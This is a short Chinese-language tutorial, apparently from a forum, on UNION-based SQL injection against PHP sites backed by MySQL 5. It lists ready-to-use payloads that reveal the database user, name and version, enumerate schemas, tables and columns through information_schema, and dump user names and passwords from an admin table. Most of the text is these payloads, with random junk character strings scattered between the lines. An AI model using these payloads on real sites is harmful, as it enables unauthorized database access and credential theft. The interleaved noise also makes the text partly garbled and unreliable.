$ y* c) O1 u. M9 {" h教程内容:Mysql 5+php 注入
0 t+ o: a# A6 I) K) l* w& y) w" F, {# ~0 x9 {1 o$ I# J
, V4 U4 z9 R2 E& h' e" Q$ v4 Q, n' h+ w: Q
一.查看MYSQL基本信息(库名,版本,用户). N* ~5 U- a( y& P
5 J' m- [; t4 mand 1=2 union select 1,2,3,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),5,6,7,8/*
- I4 Z) y, ~ ~5 X1 w
% x9 D" _! _) t0 C) h2 {6 B2 `二.查数据库( m9 e B. R: p& N9 L; U
! W9 N2 b! }" i/ l$ P5 Vand 1=2 union select 1,SCHEMA_NAME,3,4,5,6,7,8 from information_schema.SCHEMATA limit 1,1/*
' N& z/ }, x* B) i( blimit 从0开始递增,查询到3时浏览器返回错误,说明存在2个库。
/ r8 r2 W/ P' w6 Y4 h0 D* a* ~$ p# m5 W& b# s @: D4 M4 h+ q
三.暴表7 D9 z2 V8 X* B! _
4 G: B$ H/ H) ~/ T7 s8 P# x% P; W
and 1=2 union select 1,2,3,TABLE_NAME,5,6,7,8 from information_schema.TABLES where TABLE_SCHEMA =库的16进制编码 limit 1,1/*
* \1 `0 q% B2 f+ m- Z! Q& Z G) u3 T& y
limit 从0开始递增,查询到14时浏览器返回错误,说明此库存在13个表。8 i2 j2 E$ U1 y& l
2 ^! M' R W* ?! r
四.暴字段
# z" R) U/ o/ z4 }# [8 C5 _; z3 S+ _: e" e5 W
and 1=2 union select 1,2,3,COLUMN_NAME,4,5,6,7,8from information_schema.COLUMNS where TABLE_NAME=表的16进制编码 limit 1,1/*7 @& P1 e, z% t2 ~6 k
- z7 \& g- Y7 d5 g; ?. k: N
limit 从0开始递增,查询到时浏览器返回错误,说明此表存在N-1个列。
) U$ u: |: ?& H/ H# O; ]* u' n; }# C- \* e4 V7 e
五.暴数据
- k5 L o/ W ]5 z, [4 r$ y* c, U& K/ H2 b+ D
and 1=2 union select 1,2,3,name,5,password,7,8 from web.ad_user/*6 U" k9 z- M& L0 o- f
1 g; \0 Y+ Y6 y. C7 U& I- U( Q
# S! W+ Q/ M7 a: \- x' y" j: b+ {这里直接暴明文的密码,大多时候我们遇到的是MD5加密之后的密文。
. l6 `7 N3 o5 `" n0 G: K |